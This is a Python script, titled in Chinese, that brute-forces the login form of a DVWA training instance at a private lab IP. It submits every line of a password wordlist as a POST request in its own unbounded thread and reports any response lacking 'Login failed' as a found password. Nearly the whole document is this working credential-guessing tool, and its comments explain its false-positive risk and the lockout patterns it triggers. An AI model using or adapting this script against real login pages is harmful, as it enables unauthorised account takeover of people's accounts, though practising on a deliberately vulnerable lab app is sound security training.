利用Requests模块暴力破解DVWA应用

import requests   #利用requests模块提交POST请求
import threading   #利用多线程加快破解速度
import os
import sys
import termcolor


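class DwdaBruteforcer:
    """Dictionary-based login tester for a DVWA lab instance.

    Every candidate password read from a wordlist is submitted to the login
    form in its own thread. A response that does not contain the text
    "Login failed" is reported as a hit.
    """

    def __init__(self, url, username, filename):
        """Store the target and wordlist settings.

        Args:
            url: URL of the web application's login page.
            username: Account name submitted with every attempt.
            filename: Path of the password wordlist, one candidate per line.
        """
        self.username = username
        self.filename = filename
        self.url = url

    def login(self, password):
        """Submit one login attempt and print the password if it is accepted.

        Args:
            password: Candidate password to submit.
        """
        # Field names come from the DVWA login form's POST request:
        # username, password and Login.
        post_data = {
            'username': self.username,
            'password': password,
            'Login': 'Login'
        }
        try:
            # The timeout keeps a stalled connection from pinning its thread
            # forever.
            response = requests.post(url=self.url, data=post_data, timeout=10)
        except requests.RequestException as exc:
            # Report transport failures instead of hiding them: a silently
            # dropped request is indistinguishable from a rejected password.
            print('Request failed: %s' % exc, file=sys.stderr)
            return

        # "Login failed" in the returned page means the password was rejected.
        # NOTE(review): success is inferred only from the absence of that
        # text, so any other page (an error page, for instance) is also
        # reported as a hit. Treat the output as a candidate to verify.
        if "Login failed" not in response.text:
            print(termcolor.colored('Password Found: %s' % password, 'blue'))

    def brute_forcer(self):
        """Start one login attempt per line of the wordlist.

        Threads are started without a cap and are not joined here, so a
        wordlist of N lines produces up to N concurrent POSTs. That burst of
        failed logins from a single client is the pattern that login rate
        limiting and account lockout are designed to catch.
        """
        with open(self.filename, 'r') as f:
            # Iterate the file lazily rather than loading every line first.
            for line in f:
                # str.strip() already removes the trailing newline.
                password = line.strip()
                t = threading.Thread(target=self.login, args=(password,))
                t.start()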


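def main():
    """Prompt for a username and a wordlist path, then run the tester.

    The target URL is fixed to the author's DVWA lab instance. Exits with a
    non-zero status when the username is empty or the wordlist is missing.
    """
    banner = """
                ****************************

                  Web Brute Forcer By Jason

                ****************************
        """
    print(banner)
    # Account name submitted with every login attempt.
    username = input(termcolor.colored("Enter Username to Attack: ", 'blue'))
    # input() always returns a string, never None, so an empty answer has to
    # be detected by testing the stripped text.
    if not username.strip():
        print("Enter username!")
        sys.exit(1)
    # Login page of the lab DVWA instance. The scheme is plain HTTP, so the
    # submitted credentials cross the network unencrypted.
    url = "http://192.168.140.137/dvwa/login.php"
    # Path of the password wordlist, one candidate per line.
    filepath = input(termcolor.colored("Enter Path of Password Lists: ", 'blue'))
    if not os.path.exists(filepath):
        print("The File Does Not Exist!")
        sys.exit(1)
    dwda = DwdaBruteforcer(url, username, filepath)
    dwda.brute_forcer()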


# Run the interactive prompt only when the file is executed as a script,
# not when it is imported as a module.
if __name__ == "__main__":
    main()
